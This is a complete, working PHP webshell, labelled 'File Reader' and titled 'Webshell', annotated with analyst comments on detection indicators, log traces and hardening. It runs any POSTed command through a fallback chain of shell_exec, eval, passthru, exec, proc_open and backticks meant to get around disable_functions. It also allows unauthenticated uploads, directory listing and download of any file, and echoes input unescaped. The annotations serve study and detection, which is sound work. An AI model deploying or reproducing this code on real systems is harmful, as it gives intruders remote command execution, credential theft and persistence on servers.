📖 File Reader
<?php
// Directory to list: starts as the script's working directory and is replaced
// by the `dir` query parameter whenever the request supplies one.
$dir = getcwd();
// NOTE(review): the request value is used as-is. Nothing in this file
// authenticates the caller or confines the path (no realpath()/base-directory
// comparison), so scandir() runs on whatever path the request names.
// Triage: GET requests carrying a `dir` parameter with filesystem paths,
// addressed to a single PHP file, are the access-log trace of this listing.
if (isset($_GET['dir'])) $dir = $_GET['dir'];
$files = scandir($dir);
// Command-execution handler. The raw `cmd` POST field is handed, with no
// authentication and no validation, to the first branch below whose
// function_exists() test passes; the captured output is echoed back.
//
// Analyst notes:
//  - Static indicator: request data ($_POST) passed directly as the argument
//    of shell_exec / eval / passthru / exec / proc_open. Any one of these
//    data flows in a file under the web root warrants investigation.
//  - Log indicator: POST requests with a `cmd` form field to one PHP file.
//  - The chain is ordered as fallbacks against the disable_functions ini
//    setting (named in the final message). That setting narrows the chain
//    but is not a complete control on its own; pair it with blocking PHP
//    execution in writable directories and integrity monitoring of the
//    web root.
if (isset($_POST['cmd'])) {
$output = '';
// Branch 1: shell_exec — returns the command's output as a string.
if (function_exists('shell_exec')) {
$output = shell_exec($_POST['cmd']);
}
// Branch 2: eval — here `cmd` is treated as PHP source, not a shell command
// (the original comment's example is cmd='system("id");'); printed output is
// collected through output buffering.
else if (function_exists('eval')) {
ob_start();
eval($_POST['cmd']);
$output = ob_get_clean();
}
// Branch 3: passthru — writes output directly, so it is captured with
// output buffering.
else if (function_exists('passthru')) {
ob_start();
passthru($_POST['cmd']);
$output = ob_get_clean();
}
// Branch 4: exec — output lines are collected in $out and joined with "\n".
else if (function_exists('exec')) {
exec($_POST['cmd'], $out);
$output = implode("\n", $out);
}
// Branch 5: proc_open — reads the child's stdout (pipe 1) and stderr (pipe 2)
// and concatenates them.
else if (function_exists('proc_open')) {
$proc = proc_open($_POST['cmd'], [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
$output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
proc_close($proc);
}
// Branch 6: backtick operator.
else if (function_exists('`')) {
$output = `$_POST['cmd']`;
}
// Output is written into the page without htmlspecialchars(); an empty or
// falsy result produces the fallback message instead.
echo "<pre>" . ($output ?: "No bypass worked — disable_functions too strict") . "</pre>";
}
// File upload handler: stores the uploaded file in $dir under the name the
// client supplied.
// NOTE(review): there is no extension or content-type allow-list, no size
// limit, and no authentication in this file, and $dir itself can come from the
// `dir` query parameter. The return value of move_uploaded_file() is ignored,
// so "Uploaded: ..." is printed even when the move fails, and the client
// file name is echoed without htmlspecialchars().
// Triage: multipart POSTs with a `file` part to this script, followed by new
// files appearing under the web root, are the trace to look for; serving
// upload directories with script execution disabled limits the impact.
if (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $dir . '/' . $_FILES['file']['name']);
echo "Uploaded: " . $_FILES['file']['name'];
}
// File download handler: streams the file named by the `download` query
// parameter as an attachment, then stops the script.
// NOTE(review): the path passed to readfile() is the raw request value.
// basename() is applied only to the suggested attachment name in the
// Content-Disposition header, not to the path that is read, so it does not
// confine the read to any directory. There is no existence or permission
// check before the headers are sent.
// Triage: GET requests with a `download` parameter holding filesystem paths
// (configuration files, credential stores, application source) indicate what
// was read through this endpoint and should drive credential rotation.
if (isset($_GET['download'])) {
$file = $_GET['download'];
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
readfile($file);
exit;
}
?>
<!DOCTYPE html>
<html>
<body>
<h1>Webshell</h1>
<!-- Cmd Exec: posts a single `cmd` field back to this same script (the form
     has no action attribute). No credential field or CSRF token is present,
     so any client that can reach the URL can submit it. -->
<form method="POST">
<input name="cmd" placeholder="id">
<button>Run Cmd</button>
</form>
<!-- File Upload: multipart POST of one `file` part to this same script; the
     markup places no restriction on file type (no accept attribute). -->
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<button>Upload</button>
</form>
<!-- File Manager & Download -->
<ul>
<?php foreach ($files as $file) {
// Renders one list item per entry returned by scandir(), skipping the "." and
// ".." entries, with a link that feeds "$dir/$file" to the `download`
// parameter of this same script.
// NOTE(review): $dir and $file are interpolated into the HTML and into the
// URL without htmlspecialchars() or rawurlencode(), so a crafted file name or
// `dir` value is reflected into the page as markup.
if ($file != '.' && $file != '..') {
echo "<li>$file <a href='?download=$dir/$file'>Download</a></li>";
}
} ?>
</ul>
</body>
</html>